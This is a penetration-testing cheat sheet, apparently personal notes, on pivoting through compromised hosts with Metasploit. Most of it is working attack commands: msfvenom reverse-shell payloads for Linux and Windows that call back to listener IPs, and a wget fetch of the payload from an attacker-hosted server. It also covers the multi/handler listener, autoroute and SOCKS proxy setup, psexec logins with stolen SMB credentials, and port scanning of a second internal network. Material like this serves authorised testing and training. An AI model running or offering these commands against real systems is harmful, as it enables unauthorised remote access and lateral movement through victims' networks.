Metasploit Pivoting

# Reverse Shell generation

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.2.149 LPORT=8080 -f elf --platform linux --arch x64 > reverse.elf

python -m http.server --bind 192.168.2.149

wget http://192.168.2.149:8000/reverse.elf

chmod u+x reverse.elf

# Setup listener

msfconsole -q

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > run

# Autoroute module

msf5 > use post/multi/manage/autoroute

msf5 post(multi/manage/autoroute) > set SESSION 1

msf5 post(multi/manage/autoroute) > set CMD add

msf5 post(multi/manage/autoroute) > set SUBNET 10.42.42.0

msf5 post(multi/manage/autoroute) > set NETMASK /24

msf5 post(multi/manage/autoroute) > run

msf5 post(multi/manage/autoroute) > set CMD print

msf5 post(multi/manage/autoroute) > run

# On Windows you can use post/windows/gather/arp_scanner to discover other machines

# On Linux you can try arp -a

# SOCKS proxy setup

msf5 > use auxiliary/server/socks4a

msf5 auxiliary(server/socks4a) > set SRVPORT 1081

msf5 auxiliary(server/socks4a) > run

# This is now equivalent to a dynamic SSH port forward (a SOCKS proxy listening on port 1081)

# Double Pivoting

# Reverse shell from pwned2 (second network) back to pwned1 (the first pivot host)

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.42.42.1 LPORT=8088 -f exe --platform windows --arch x64 > reverse.exe

# Set up the handler and exploit the vulnerability found

============================================================

MSFCONSOLE:

use exploit/windows/smb/psexec

set rhosts <first_network_ip>

set smbdomain <domain.local>

set smbpass <password>

set smbuser <user>

set payload windows/x64/meterpreter/reverse_tcp

set lhost eth0

set target 2

run

After getting a shell:

route print

ipconfig

arp -a   (shows the other network's IPs this host is talking to; they appear under a different NIC, between the *.1 and *.255 entries)

Press CTRL+C and answer Y to return to the meterpreter prompt

from meterpreter:

run autoroute -s <new network/24>

run autoroute -p

background

search portscan

use 5   (the tcp scan entry; the number depends on your search results)

set rhosts <IP_in the new network>

set ports 445   (SMB)
